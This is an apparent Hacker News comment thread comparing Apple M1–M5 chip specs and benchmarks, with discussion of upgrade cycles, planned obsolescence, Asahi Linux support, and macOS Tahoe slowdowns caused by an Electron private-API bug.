hereme888 3 hours ago

Base models only:

- M1 | 5 nm | 8 (4P+4E) | GPU 7–8 | 16-core Neural | Memory Bandwidth: 68.25 GB/s | Unified Memory: 16 GB | Geekbench6 ~2346 / 8346

- M2 | 5 nm (G2) | 8 (4P+4E) | GPU 8–10 | 16-core Neural | Memory Bandwidth: 100 GB/s | Unified Memory: 24 GB | Geekbench6 ~2586 / 9672

- M3 | 3 nm (first-gen) | 8 (4P+4E) | GPU 8–10 | 16-core Neural | Memory Bandwidth: 100 GB/s | Unified Memory: 24 GB | Geekbench6 ~2965 / 11565

- M4 | 3 nm (second-gen) | 10 (4P+6E) | GPU 8–10 | 16-core Neural | Memory Bandwidth: 120 GB/s | Unified Memory: 32 GB | Geekbench6 ~3822 / 15031

- M5 | 3 nm (third-gen) | 10 (4P+6E) | GPU 10 | 16-core Neural | Memory Bandwidth: 153 GB/s | Unified Memory: up to 32 GB | Geekbench6 ~4133 / 15437 (9-core sample)

  • runjake 2 hours ago

    Let's see if I can turn this into an ASCII table and have it survive HN's reformatting.

        +------+------------------+--------------+----------+----------------+-------------------+-------------------+---------------------------+
        | Chip | Process          | CPU Cores    | GPU      | Neural Engine  | Memory Bandwidth  | Unified Memory    | Geekbench6 (Single/Multi) |
        +------+------------------+--------------+----------+----------------+-------------------+-------------------+---------------------------+
        | M1   | 5 nm             | 8 (4P+4E)    | 7–8      | 16-core Neural | 68.25 GB/s        | 16 GB             | ~2346 / 8346              |
        | M2   | 5 nm (G2)        | 8 (4P+4E)    | 8–10     | 16-core Neural | 100 GB/s          | 24 GB             | ~2586 / 9672              |
        | M3   | 3 nm (first-gen) | 8 (4P+4E)    | 8–10     | 16-core Neural | 100 GB/s          | 24 GB             | ~2965 / 11565             |
        | M4   | 3 nm (second-gen)| 10 (4P+6E)   | 8–10     | 16-core Neural | 120 GB/s          | 32 GB             | ~3822 / 15031             |
        | M5   | 3 nm (third-gen) | 10 (4P+6E)   | 10       | 16-core Neural | 153 GB/s          | up to 32 GB       | ~4133 / 15437 (9-core)    |
        +------+------------------+--------------+----------+----------------+-------------------+-------------------+---------------------------+
    • jacobolus 3 minutes ago

      Or to fit in a narrower window:

         ------------------|-----------|------|------------|-------------|--------------|-----------------------
         Chip              | CPU       | GPU  | Neural     | Memory      | Unified      | Geekbench6
         Process           | Cores     |      | Engine     | Bandwidth   | Memory       | Single/Multi 
         ------------------|-----------|------|------------|-------------|--------------|-----------------------
         M1   5 nm         | 8:  4P+4E | 7–8  | 16-core    | 68.25 GB/s  | 16 GB        | ~2346 / 8346          
         M2   5 nm G2      | 8:  4P+4E | 8–10 | 16-core    | 100 GB/s    | 24 GB        | ~2586 / 9672          
         M3   3 nm 1st-gen | 8:  4P+4E | 8–10 | 16-core    | 100 GB/s    | 24 GB        | ~2965 / 11565         
         M4   3 nm 2nd-gen | 10: 4P+6E | 8–10 | 16-core    | 120 GB/s    | 32 GB        | ~3822 / 15031         
         M5   3 nm 3rd-gen | 10: 4P+6E | 10   | 16-core    | 153 GB/s    | up to 32 GB  | ~4133 / 15437 (9-core)
         ------------------|-----------|------|------------|-------------|--------------|-----------------------
    • PeterCorless 31 minutes ago

      You've done yeoman's work, lad.

  • nu11ptr 3 hours ago

    The step down from 32GB to 24GB of unified memory is interesting. Theories? Perhaps they decided M4 allowed too much memory in the standard chip and they want to create a larger differential with Pro/Max chips?

    Update: I am thinking the 24GB for M5 is a typo. I see on Apple's site the 14 inch MBP can be configured optionally with 32GB of RAM.

    • makeramen 3 hours ago

      That seems like a typo or incorrect info, the M5 MBP definitely can be configured up to 32 GB, and the Apple page mentions 32 GB explicitly as well.

    • eftychis 3 hours ago

      I had the same question, but I can only speculate at the moment. The cynical part of me thinks along similar lines: create an artificial differentiation and push people to upgrade.

      If anyone has any real clues that they can share pseudonymously, that would be great. Not sure which department drove that change.

      • brailsafe 11 minutes ago

        They definitely do that. You could get 64GB of RAM without going up to the top-spec CPU of the Max tier in the M1 and M2 generations, but with the M4 Pro you can only do 24 or 48GB, while on the lower-spec M4 Max you can only do 36GB and nothing else; only the absolute best CPU can do 64. So if you were otherwise going to get the 48GB M4 Pro, you'd have to spend another ~$1200 USD to get another 16GB of RAM, if all you cared about was RAM.

        There may be a technical explanation for it, but incentives are incentives.

    • christkv 3 hours ago

      They still have an option for 32GB.

    • surcap526 an hour ago

      Apple is running a planned obsolescence scam.

      • umanwizard an hour ago

        M1 MBPs are still great laptops. In fact, there are even Intel models from 2019 that are still officially supported. Apple is pretty much the last company it makes sense to accuse of planned obsolescence.

        • mschuster91 an hour ago

          Yup, but only on the hardware side. On the software side, you are entirely at their mercy. Unlike Windows, which goes to utterly ridiculous lengths to keep software dating back to the Windows 95 era running on top-notch Windows 11 systems, Mac developers are all too used to having to constantly keep up with whatever crap Apple has changed and moved around this time.

          • ben_w 11 minutes ago

            I've tried running old Civ2 on a recent windows machine, no dice.

            I'm sure it's possible to do that, but the backwards compatibility on Windows is definitely not as good as you say.

            That said, I'm also currently, as a fun personal project, converting a game originally written for 68k Macs, which still has parts explicitly labelled as being for resource forks; and I've lived through (and done work on) the 68k, PPC, Intel, and M-series hardware transitions, plus all the software changes, so I agree with you about Apple.

          • tgma 28 minutes ago

            Windows, huh?

            Pulled shenanigans wrt TPM requirements for Windows 10 and 11. Actively trying to make sure people log in to a Microsoft Account and making it hard to use Local Accounts.

            > Mac developers are all too used of having to constantly keep up with whatever crap Apple has changed and moved around this time.

            Mmm...

              Win16 API
              Win32 API
              MFC
              ATL
              .NET WinForms
              .NET Avalon/WPF
              Silverlight
              MAUI
              ...
            • mschuster91 18 minutes ago

              For what it's worth, I'm running Mac mostly, outside of ham radio stuff, because there's just so much stuff that's only available on Windows.

              The thing with all the mentioned APIs is that, excluding the 16-bit stuff (which got yeeted in Win7 x64, but if you did need it you could run Win7 x86), you can still run software using them without too much of a hassle, and you most probably can compile it if you need to fix a bug.

              Good luck trying to get a Mac game from the 90s running on any Mac natively without an emulator/VM in contrast.

          • umanwizard 9 minutes ago

            That doesn't really have anything to do with planned obsolescence. Causing churn for developers is not intended to make people buy more Macs before they should need to, which is what planned obsolescence means.

  • gigatexal 3 hours ago

    Amazing. My M3 Max is going to look like a paperweight very soon. And that's fine by me. When I get an M6 or M7 Max to replace it, it'll be amazing.

    • bombcar 3 hours ago

      I’m trying to find any reason I can that my M1 Max needs replacement; it’s hard. How do you justify it?

      • djtriptych 3 hours ago

        Same. I have an M1 Max Studio and it's just laughing at the little workloads I throw at it (pro photo editing, music production, software dev, generally all at the same time).

        It just never sweats AT ALL - it feels like a decade from obsolescence based on what I'm doing now.

        It would have to be an order of magnitude faster for me to even notice at this point.

        • zahirbmirza 2 hours ago

          Obsolescence for Macs comes when Apple decides not to allow your Mac to update the OS to the latest one.

          • phony-account 2 hours ago

            > Obsolescence for Macs comes when Apple decides not to allow your Mac to update the OS to the latest one.

            That doesn’t make it obsolete, at all.

            • badc0ffee 2 hours ago

              When they stop releasing security patches for that OS version 2 years later, it becomes more risky to connect the thing to a network. Or take in any data from the outside, really, whether it's via Bluetooth, or USB drive.

              And then there's 3rd party software that will stop supporting that old OS version, in part because Apple's dev tools make that difficult.

              Eventually, Apple's own services will stop supporting that OS - no convenient iCloud support.

              Finally, the root CA certs bundled with the OS will become too out of date to use.

              I'm planning on putting Linux on my Intel Mac Mini soon. But when a M3+ Mini goes out of support, will we have that option?

              • unilynx an hour ago

                Don't forget about Boot Camp for the (soon) obsolete Intels.

                With a debloated Windows 10 (which we're not going to connect to the internet anyway) they can live on for older games.

            • jkestner an hour ago

              I’ve got a 2010 MBP that’s still perfectly suitable, but without OS updates, I can’t get a browser that websites will load cleanly on, can’t use Xcode, a bunch of the Apple services the company hooks you on don’t work, etc. I used the OpenCore bootloader to extend its life into newer macOSes, but that’s getting hard to keep up with. What a (e)waste.

              • snowwrestler 22 minutes ago

                I’ve got a “late 2008” MacBook Pro that connects to sites ok in Firefox. That seems to be the browser that does the best at long-term support for old Macs.

              • NetMageSCW an hour ago

                It is 15 years old - I think it is past eWaste into antique.

              • davidkwast an hour ago

                You can use Ubuntu. I use Ubuntu on a 2009 MBP and on a 2010 too.

              • holoduke 11 minutes ago

                My old MacBook Air from 2010 has already been running Home Assistant on Ubuntu for 6 years. It's in my fuse/meter room, running 24 hours a day.

            • zahirbmirza 2 hours ago

              Depends on if you use Xcode or not... I still have my 12-inch MacBook; for work use, it is amazing, but I can't run the latest Xcode, making it defunct for some of my uses. It would be fine running Xcode, weak as it is, I'm sure. Liquid Glass might have killed it though.

            • skor an hour ago

              I use one from around that time to teach my kid basic stuff; you can run Linux on it as well.

            • manmal 2 hours ago

              Patches for old OS versions unfortunately don't cover 100% of security issues. Apple often argues that vulns can only be fixed in actively supported versions.

            • zahirbmirza 2 hours ago

              Also, would love to hear any tips you have for eking out more use... Sounds like you may have some...

        • oblio 3 hours ago

          You're not opening enough Chrome tabs. Or Electron apps.

        • andrepd 3 hours ago

          You're clearly running low-intensity tasks (pro photo editing, music production, software dev, generally all at the same time) instead of highly-demanding ones (1 jira tab)

        • poultron 2 hours ago

          Obsolescence comes when Apple conveniently "optimizes" a new architecture in the OS for a new chip... that conveniently, ironically, somehow severely de-optimizes things for the old chips... and suddenly that shiny new OS feels slow and sluggish and clunky and "damn, I need to upgrade my computer!" They'll whitewash it not as planned obsolescence but as optimization for new products. It doesn't have to be that way, and shouldn't be, but it's incredibly profitable.

          • MPSimmons 2 hours ago

            Maybe by that time ARM linux on this platform will be excellent and we can migrate to it for old gear. I still have a 2011 MBP running Linux on my electronics workbench and it is just fine.

      • dgacmu 10 minutes ago

        I finally replaced my M1 mini because of memory capacity (16GB doesn't cut it for me and jumping to 64 was worth it), but I'm having the same feeling about my M1 Pro MBP with 32GB. It just still works so well for nearly everything I do.

        I'm guessing the M5 Pro may support 64GB but...

      • smith7018 2 hours ago

        You should wait until next fall if you don't really need to replace your M1 Max. Rumors say that Apple's going to redesign the MacBook Pros next year with an OLED screen.

        • jltsiren an hour ago

          I would rather buy the last refresh of the old design. Waiting for a redesign is risky, as some redesigns are just bad (like the Touch Bar MBP). And Apple is opinionated enough that it often refuses to admit its mistakes and sticks with them for years.

          • anigbrowl 22 minutes ago

            I got an old MBP with the touchbar as payment for a favor last year and I quite like it. I don't know why it gets so much hate.

            • no_wizard 12 minutes ago

              I think it’s because of the non-optionality of it. If you could have gotten everything else with or without the Touch Bar, people could have simply made their choice based on preference.

              In the end they reverted because they were not willing to make it optional. They also never released a Touch Bar keyboard for desktop, which would perhaps have made it more useful.

            • skor 12 minutes ago

              No escape key, that's one reason.

        • kossTKR 2 hours ago

          For the love of god remove the notch, that's the only idiotic branding vestige left.

          • mort96 an hour ago

            And put the web cam where?

            The notch is bigger than it should be for sure, I would've loved for it to be narrower. But I don't really mind the trade-off it represents.

            You could add half an inch of screen bezel and make the machine bigger, just to fit the webcam. Or you could remove half an inch of screen, essentially making the "notch" stretch across the whole top of the laptop. Or you could find some compromise place to put the camera, like those Dell laptops which put the camera near the hinge. Or you can let the screen fill the whole lid of the laptop, with a cut-out for the camera, and design the GUI such that the menu bar fills the part of the screen that's interrupted by the notch.

            I personally don't mind that last option. For my needs, it might very well be the best alternative. If I needed a bigger below-the-notch area, I could get the 16" option instead of the 14" option.

            • bobthepanda 14 minutes ago

              I wonder how hard it would be to have a camera 'pop up' from the laptop. (I'm not a hardware guy)

            • hu3 15 minutes ago

              The Dell XPS has a webcam, no notch, and the same bezel as MacBooks.

              Maybe it's a patent thing.

              • mort96 8 minutes ago

                They have the solution I mentioned, with the webcam near the hinge. I had a couple of Dell XPS laptops like that. It's fine if the webcam is really just an afterthought for you, but it does mean the webcam has a very unflattering angle that's looking up your nostrils.

                I use my webcam enough these days, taking part in video meetings, that it'd be a pretty big problem for me.

          • brookst an hour ago

            You want a strip of black plastic across the entire top rather than pixels to the left and right of the camera?

      • montebicyclelo 2 hours ago

        On the contrary; now might be a good time to get an M1 Max laptop. A second-hand one, ex-corporate, in good condition, with 64GB of RAM, is pretty good value compared to new laptops at the same price. It's still a fantastic CPU.

        • andrei_says_ 16 minutes ago

          Where would one look for ex-corporate MacBook Pros?

        • ozarkerD an hour ago

          That's what I did: bought a used one with 64GB and a dent in the back for ~$1k, a year back or so. Some of the best money I've ever spent.

        • simondotau 39 minutes ago

          Honestly the only Apple Silicon e-waste has been their 8GB models. And even those are still perfectly good for most people so long as they use Safari rather than Chrome.

      • gigatexal 44 minutes ago

        I do a lot with VMs and other memory-intensive things, so I went with 128GB of RAM. I'm hoping for a laptop with 256GB+ in a few generations; one with more or less double the oomph would be nice. Everything can be faster, bring it on!

      • nu11ptr 3 hours ago

        I am in the same boat, as my Rust compile times are solid. I'm good for now, but with the M4 Max twice as fast, the M5 Max next year could be a tempting upgrade.

    • rootusrootus 2 hours ago

      I was thinking similar thoughts about my M2 Max MBP. I look at the newer chips and wonder at what point the base M chip will outperform my M2 Max (or has it happened already?). I'll probably hold onto it a while anyway -- I think it will be a while before I find 96GB limiting or the CPU slow enough for my purposes, but I'd still like to know how things are progressing.

  • alberth 2 hours ago

    Did TSMC 2nm slip to next year, or was it always planned to be 2026?

    • hooch 5 minutes ago

      There was always one more iteration of 3nm in the plan.

  • rick_dalton 3 hours ago

    The multi-core geekbench score for the M5 is the 9 core version iirc. The 10 core score isn't out yet as far as I know.

  • LarsDu88 an hour ago

    Does this mean the M5 is seriously as fast as my Intel 13900 CPU?

  • ElijahLynn 3 hours ago

    Thank you! Since this is the top rated comment, can you also add M1 and M2 as well?

  • morshu9001 3 hours ago

    And the fastest M4 Max was already the fastest single- and multicore CPU by a decent margin, while the fastest non-Apple CPUs were only specialized for single or multi.

    • AnthonyMouse 2 hours ago

      The single-thread performance of modern high-performance CPUs is all very close. Apple's latest usually has a small advantage because they're the first to use TSMC's latest nodes, which is good for something like 15-20%.

      The fastest multicore CPUs are the ones with a lot of cores, e.g. 64+ core Threadrippers. These have approximately the same single-core performance as everything else from the same generation because single-core performance isn't affected much by number of cores or TDP, and they use the same cores.

      Everyone also uses Geekbench to compare things to Apple CPUs but the latest Geekbench multi-core is trash: https://dev.to/dkechag/how-geekbench-6-multicore-is-broken-b...

      • morshu9001 an hour ago

        I was going by Geekbench. If it's broken then yeah.

  • jay_kyburz 2 hours ago

    Serious questions. How is Asahi these days? Is it ready as a daily driver? Is it getting support from Apple or are they hostile to it? Are there missing features? And can I run KDE on it?

    • pbasista an hour ago

      > How is Asahi these days?

      Much less active than it used to be when it was run by Hector Martin. The core development is a lot slower. Although the graphics stack, for instance, has reached a very mature state recently.

      > Is it ready as a daily driver?

      It depends. Only M1 and M2 devices are reasonably well-supported. There is no support for power-efficient sleep, DisplayPort, Thunderbolt, video decoding or encoding, or Touch ID. The speakers overheat and turn off momentarily when playing loud for a longer period of time. The audio stack in general had to be built from the ground up, and it seems to me like there are bits and pieces still missing or configured sub-optimally.

      > Is it getting support from Apple?

      Not that I am aware of.

      > are they (Apple) hostile to it?

      Not to my knowledge.

      > Are there missing features?

      Plenty, as described above. There has been some work done recently on Thunderbolt / DisplayPort. Quite a few other features are listed as WIP on their feature support page.

      > Can I run KDE on it?

      Of course. KDE Plasma on Fedora is Asahi Linux's "flagship" desktop environment.

    • SXX 2 hours ago

      On the MacBook Air M1, Asahi is pretty usable when it comes to hardware support, and it has been usable for at least a year.

      Though either Fedora itself, how it's built for Asahi, or just running it with little disk space ended up freezing on boot after random updates. Twice, once without even rpmfusion enabled. Either some weird btrfs issue or I don't know what.

      I've been a Linux dude for two decades and don't do anything fancy, so this is weird. I switched to Asahi Ubuntu on ext4 and it's working great so far.

    • jay_kyburz 2 hours ago

      Never mind. Found this. Still a ways to go. https://asahilinux.org/docs/platform/feature-support/m4/#tab...

      • zargon an hour ago

        Asahi will probably only ever be feasible for years-old hardware. macOS is a total non-starter for me, so maybe one day I’ll end up with one of these, but only as some kind of tertiary / retro machine.

      • filmgirlcw an hour ago

        Yeah, given all the people with passion/ability for low-level reverse engineering have left the project, I don’t think we should ever expect to get greater than M2 support from Asahi. Maybe one day another project will pick up the ideas, but for anyone not wanting to use years old hardware, the dream of Linux almost natively existing on modern Apple silicon remains just that: a dream.

  • LordDragonfang 2 hours ago

    Interesting to see that over 5 years (M1 was 2020), the benchmark performance has not quite doubled. Is this an indictment of Moore's law, or just Apple over-speccing the M1 and slowly decreasing that over time?
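
    For reference, a quick back-of-the-envelope check of that claim, using the Geekbench 6 numbers from the table above (a sketch in Python; the scores are the single-sample figures quoted there, not averages):

        # Geekbench 6 scores quoted above: M1 (2020) vs. M5 (2025)
        scores = {"single": (2346, 4133), "multi": (8346, 15437)}
        years = 5

        for label, (old, new) in scores.items():
            ratio = new / old
            annual = ratio ** (1 / years) - 1
            print(f"{label}: {ratio:.2f}x over {years} years (~{annual:.0%}/year)")

        # single: 1.76x over 5 years (~12%/year)
        # multi: 1.85x over 5 years (~13%/year)

    So roughly 12-13% per year compounded; doubling in 5 years would need ~15%/year.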

    • imoverclocked an hour ago

      Moore's law has never been an absolute, and it's about the number of transistors per mm^2, not speed. Sometimes progress is a little faster and sometimes it's a little slower.

  • B1FF_PSUVM 3 hours ago

    Thank you. Looking at replacing an Intel MacBook Air, I hope there are price drops on the "outdated" M4s (although an M2 phased out early this year would do well enough...)

  • jjcm 3 hours ago

    They're going to have a hard time selling the M5 compared to the M4 Pro. Geekbench for that chip is 3843/22332, which is slightly slower single-core but better multi-core, and it also has Thunderbolt 5 instead of 4.

    • NetMageSCW an hour ago

      Fortunately they will be selling the M5 Pro against the M4 Pro (and, more likely, their expectation is that no one with the current Pro is going to upgrade after one generation), so it will be easier.

    • GeekyBear 2 hours ago

      The numbers for M5 Geekbench are for the binned iPad Pro version with one performance core disabled.

      It's the only M5 device that leaked to the public early.

mumber_typhoon 8 hours ago

The M5 MacBook Pro still gets the Broadcom WiFi chip but the M5 iPad Pros get the N1 and C1X (Sweet).

All in all, Apple is doing some incredible things with hardware.

Software teams at Apple really need to get their act together. The M1 itself is so powerful that nobody really needs to upgrade it for most things most people do on their computers. Tahoe, however, makes my M1 Air feel sluggish doing the exact same tasks I've been doing for the last couple of years. I really hope this is not intentional from Apple to make me upgrade. That would be a big letdown.

  • kokada 8 hours ago

    > Tahoe, however, makes my M1 Air feel sluggish doing the exact same tasks I've been doing for the last couple of years.

    I have a work-provided M2 Pro with 32GB of RAM. After the Tahoe upgrade it feels like one of the sluggish PCs at the house. It is the only one where I can see the mouse teleporting sometimes when I move it fast. This is after disabling transparency in Accessibility settings, mind you; it was even worse before.

    • runjake 4 hours ago

      It's probably due to the Electron bug[1]. A lot of common apps haven't been patched yet.

      I also have an M2 Pro with 32GB of memory. When I A/B test with Electron apps running vs without, the lag disappears when all the unpatched Electron apps are closed out.

      1. https://avarayr.github.io/shamelectron/

      Here's a script I got from somewhere that shows unpatched Electron apps on your system:

      Edit: HN nerfed the script. Found a direct link: https://gist.github.com/tkafka/e3eb63a5ec448e9be6701bfd1f1b1...
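
      In the meantime, the rough shape of such a check is simple enough to sketch (a hypothetical stand-in, not the gist's actual code; it assumes the standard Electron app layout, where the app bundles "Electron Framework.framework" and its Info.plist carries a version you'd compare against the patched-version list in [1]):

          #!/usr/bin/env python3
          # Sketch: find apps in /Applications that bundle Electron and
          # print the bundled framework version (assumption: the version
          # in the framework's Info.plist tracks the Electron release).
          import plistlib
          from pathlib import Path

          for app in sorted(Path("/Applications").glob("*.app")):
              fw = app / "Contents/Frameworks/Electron Framework.framework"
              if not fw.exists():
                  continue
              version = "unknown"
              plist = fw / "Resources/Info.plist"  # symlink to Versions/Current
              if plist.exists():
                  with open(plist, "rb") as f:
                      version = plistlib.load(f).get("CFBundleShortVersionString", "unknown")
              print(f"{app.name}: Electron Framework {version}")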

    • speedgoose 7 hours ago

      Do you have a few Electron-powered apps that didn't get updated yet?

      Electron used to override a private function, which makes macOS sluggish on Tahoe, and apparently no one at Apple uses Electron apps while doing testing.

      • kokada 7 hours ago

        I keep my applications pretty much up to date, but I didn't check the release notes for each Electron application I have to make sure they're updated. I still think this is a failure of macOS, since one misbehaving application shouldn't cause the whole environment to slow to a crawl.

        What I can say is that while the situation is much better than at Day 1, the whole Tahoe experience is not as fluid as Sequoia.

        Also, it doesn't really matter to me whether this was a private function or not; if this were Windows or Gnome/KDE, people would blame the developers of the desktop instead.

        • dylan604 6 hours ago

          It shouldn't be the user's responsibility to know what architecture the software uses and then need to go look at upgrading it. Upstream comments blame Apple for this, for "not testing Electron apps internally", but I don't expect Apple to regression-test every single app ever released. Apple releases betas, and software devs are expected to test their apps against them. The problem comes from the app devs using a bit of private code, which you are advised not to do for this very reason. Even if Apple did test and find the result, it would still be the app dev that would need to fix it. Maybe the thought is that an email from Apple to the dev saying "fix your code" would be more compelling?

          • kokada 6 hours ago

            > Upstream comments blaming Apple for this for "not testing Electron apps internally", but I don't expect Apple to test every single app ever released for regression testing.

            This happens in pretty much every Electron app as far as I know, and lots of Electron apps, like Spotify, VSCode or Slack, are very likely to be in the Top 10 or at least Top 100 most used apps. And yes, I would expect Apple to test at least the most popular apps before releasing a new version of their OS.

            > Maybe the thought is that an email from Apple to the dev saying "fix your code" would be more compelling?

            Of course not. Apple controls the SDK; they could work around this in many different ways. For example, instead of changing how this function was implemented, they could introduce a new method (they're both private so it doesn't matter) and effectively ignore the old method (maybe they could also add a message for developers building their application that this method was removed). It would draw ugly borders in the affected apps, but it wouldn't cause this issue at least.

            • dylan604 6 hours ago

              > (maybe they could also add a message for developers building their application that this method was removed)

              Why do we think this would be a solution, when the devs clearly ignored the previous message about not using a private method?

              • kokada 5 hours ago

                > Why do we think this would be a solution, when the devs clearly ignored the previous message about not using a private method?

                If anything, the fact that devs can actually access private symbols is an issue with how Apple designed their APIs, because they could make this so annoying to do that nobody would try (for example, by stripping symbols).

                Also, the fact that devs need to access private symbols to do what they need shows that the public API is lacking at least some features.

                Another thing: if this only affected the app itself, that would be fine, but this makes the whole system slow to a crawl.

                So while devs share some of the blame here (and I am not saying they don't), I still think this whole situation is mostly Apple's fault.

                • tedivm 4 hours ago

                  If you actually read the specific bug and use of a private method, it really was a stupid decision by one developer a while ago that just fell through the cracks. There really wasn't a benefit to doing what they did, which is why their fix was to just go back to using public APIs.

                  I think the failures here are that Apple should have tested this themselves and the Electron devs should have tested and resolved this during the beta period.

                  • magicalist 2 hours ago

                    > If you actually read the specific bug and use of a private method, it really was a stupid decision by one developer a while ago that just fell through the cracks. There really wasn't a benefit to doing what they did, which is why their fix was to just go back to using public APIs.

                    I don't think it's that clear cut. It looks like it was a workaround for a macOS rendering bug going back to at least 2017; it landed in 2019 and had no apparent downsides for six years[1].

                    The PR removing the private API code also included someone verifying that Apple had fixed the original bug some time in the intervening years[2].

                    I probably wouldn't have taken this approach personally (at the very least, file the original rendering issue with Apple and note it with the code, though everyone knows the likelihood of getting even a response on an issue like that), but it wasn't some cargo-culted fix.

                    [1] https://github.com/electron/electron/pull/20360

                    [2] https://github.com/electron/electron/pull/48376#issuecomment...

                  • conductr an hour ago

                    Who’s to say Apple didn’t test it and pushed it out anyway to force the Electron devs’ hands? It’s their garden and they can move the walls.

                    • kokada an hour ago

                      This only made Apple look bad; again, this is not a bug that makes the app slow, it makes the whole system slow.

                      Imagine now that you're a non-tech-savvy user who probably doesn't update apps as often; you are probably wondering why "my laptop is so slow after updating". But like I said in the other thread, maybe this is on purpose, to make people upgrade.

            • 0x457 3 hours ago

              Spotify doesn't use Electron, though. Also, I do not expect Apple to care about Electron, because delivering a shitty Electron experience only benefits their native apps.

              • kokada an hour ago

                If anything, the one that got a worse reputation here is Apple itself. The bug basically slows the whole system, not just the application with the bad behavior.

                Sure, people on Hacker News now know that the issue is "that Electron bug", but I am sure lots of other people who are less tech-savvy just kept wondering what the hell was happening, and maybe even considered an upgrade. But maybe that is the whole point.

                • NetMageSCW 44 minutes ago

                  Seems like the right patch is to just crash any app attempting to use the private API, so blame would go where it is deserved. And if it caused a lot more awareness of the need to get rid of Electron, bonus.

        • speedgoose 7 hours ago

          Yes I think Apple is to blame there. Electron is so prominent that they should have detected the problem and found a solution well before the general release.

          • wrs an hour ago

            Apple just doesn’t work that way, and hasn’t since I worked there in the 90s. Private APIs are out of bounds. It’s like a “the FBI doesn’t negotiate with kidnappers” situation.

          • IMTDb 5 hours ago

            So now you can disregard the notion of "private function" if you pass 100k stars on GitHub?

            • javawizard 4 hours ago

              There's definitely a line of thinking that would say "yes": https://www.hyrumslaw.com/

              • 0x457 3 hours ago

                Sure, someone will depend on it; we've all ignored "private" vs "public" at least once. Okay to do, and okay to be mad when your thing breaks because you decided to depend on it? Nope.

                • Dylan16807 an hour ago

                  Okay to be mad the OS vendor didn't do anything to help when the users are the ones that face the fallout? Yes.

                  Even if you disqualify the devs from being mad, everyone else gets to be mad.

                  • 0x457 an hour ago

                    The vendor did help... it marked the function as private. I view this specific incident as another argument against Electron, so I'm biased.

                    • Dylan16807 14 minutes ago

                      That's a good initial step. But once it got put on a zillion computers, there should have been additional mitigation steps.

                      In an ideal situation, they would have noticed the widespread use of this private function a long time ago, put a note on the bug report that it works around, and after they fixed the bug they would have reached out to electron to have them remove that access.

            • ruined 4 hours ago

              all APIs are public APIs

              • NetMageSCW 43 minutes ago

                Only if you don’t care about your users or your app’s reputation. Of course, if you are using Electron, those ships have already sailed.

      • placatedmayhem 7 hours ago

        The check script I've been recommending is here:

        https://github.com/tkafka/detect-electron-apps-on-mac

        About half of the apps I use regularly have been fixed. Some might never be fixed, though...

        • EasyMark 6 hours ago

          Wasn't there a workaround for those apps that might not ever get updated? I thought I saw something on Reddit. Some config change.

      • EasyMark 6 hours ago

        This is why I stay on the previous release until at least 0.2 or 0.3, to let them work out the bugs so I don't have to deal with them. There was nothing in 26 that felt pressing enough to me that I would need to update.

        • abustamam 4 hours ago

          Tbh I'm purposely not updating because I'm not in love with the new ~Aero~ glass UI.

      • michelb 5 hours ago

        Even the OS and stock apps are much slower in Tahoe. And the UI updates/interactions are also slower. I’m lucky I only upgraded my least-used machine, and that’s a well-stocked M2.

        • astrange 4 hours ago

          It should not be slower. File a report in Feedback Assistant.

      • nikanj 3 hours ago

        Or more likely nobody gives a damn about performance while doing testing.

    • kobalsky 7 hours ago

      My tinfoil-hat theory is that on each OS iteration, Apple adds a new feature that leverages the latest chips' hardware acceleration features, and for older chips they do software-only implementations.

      They ship-of-Theseus the crap out of their OS, but replace parts with ones that need these new hardware features, which run slow on older chips due to the software-only implementations.

      I got the first-generation iPad Pro, which is e-waste now, but I use it as a screen for my CCTV. It cannot even display the virtual keyboard without stuttering like crazy, it lags switching apps, there's a delay for everything; this thing was smooth as butter on release.

      • thewebguyd 6 hours ago

        I have the 4th gen (2020) iPad Pro with the A12X Bionic, the same chip they put in the Apple Silicon transition dev kits. With iPadOS 26 it's become barely usable, despite having been as performant as ever on iPadOS 18. I'm talking a huge drop in performance, stutters and slowdowns everywhere.

        I was considering just replacing the battery and keeping it for several more years, but now I feel forced to upgrade, which has me considering whether I still want/need an iPad, since I'd also have to buy a new Magic Keyboard (they redesigned it), and they bumped the price ($1299 now vs. $999 when I got the 4th gen), so I'd be looking at $1700. Trying to hold out for an iPad Air with ProMotion.

        I may be in the minority here, but I think 5 years is too short a lifespan for these devices at this point. In the early days, when things were advancing like crazy, sure. But now? I have 8-year-old computers that are still just fine, and with the M-series chips I'd expect at least 10 years of usable life at minimum (battery notwithstanding).

        • qingcharles 6 hours ago

          That's weird. I have an 8th Gen iPad, the slowest device that can run iPadOS 26, and everything is fine on that old thing. (except the OS takes up the majority of the storage)

          • dwood_dev 3 hours ago

            The 8th gen iPad is about the same on iPadOS 26 as on 18 for me, which is slow. The 32GB of storage really handicapped it; to even upgrade it, I have to factory reset it first. I'm replacing it with a Mini.

            The iPad Air 13 with an M3 is a really nice experience. Very fast device.

          • thewebguyd 6 hours ago

            Interesting. Might try a factory reset then and see. There's noticeable lag for me; it's especially slow when switching apps or bringing up the keyboard, as well as on first unlock. Interacting within a single app is still fine, it's interacting with the OS that's really sluggish.

            • NetMageSCW 41 minutes ago

              How long have you been running on 26? Every iOS/iPadOS update takes a few days to stabilize.

            • gosub100 4 hours ago

              Total guess but is there a tiny fan inside that got filled with dust? Maybe it's thermal throttling.

              • sgerenser 3 hours ago

                Apple has never made an iPad with a fan

      • trinix912 2 hours ago

      Plus they don't let you downgrade to previous iOS versions on iPhones and iPads (unless you've been smart enough to save SHSH blobs and all that), so the only option to revert to a smooth version now is to download a sketchy jailbreak.

    • prettyblocks 4 hours ago

      I'm on an M2 with 24GB of RAM and it feels like it flies as fast as ever.

    • ExoticPearTree 7 hours ago

      26.0.1 fixed the sluggishness. 26.0 was pretty unstable; it felt like a game dropping frames.

      • kokada 7 hours ago

        26.0.1 is better, but I can still get sluggishness in a few specific cases.

        I just got one example while moving the mouse quickly across my dock (I still use the magnify animation): I can clearly see it dropping a few frames. This never happened in macOS 15.

    • Angostura 3 hours ago

      I don't get this - I have an M1 iMac and haven't noticed much difference.

    • tsunamifury 5 hours ago

      Disabling transparency adds another draw layer that is opaque on top, making it even worse than when it’s on.

      • array_key_first an hour ago

        If they developed it in the most naive and stupid way imaginable, sure. If we're assuming Apple isn't filled with 3rd year comp sci students, then no.

  • SkyPuncher 6 hours ago

    There are so many software related things that drive me absolutely loony with Apple right now.

    * My iPhone as a remote for my Apple TV has randomly decided it can no longer control the volume - despite the "Now Playing" UI offering an audio control that works.

    Their auth screens drive me crazy:

    * Why can I not punch in a password while Face ID is working? If I'm skiing, I know Face ID isn't going to work; stop making me wait.

    * Likewise, on Apple TV the parental control input requires me to explicitly choose to enter a PIN code. Why? Just show me the PIN code screen. If I can approve from my device, I will.

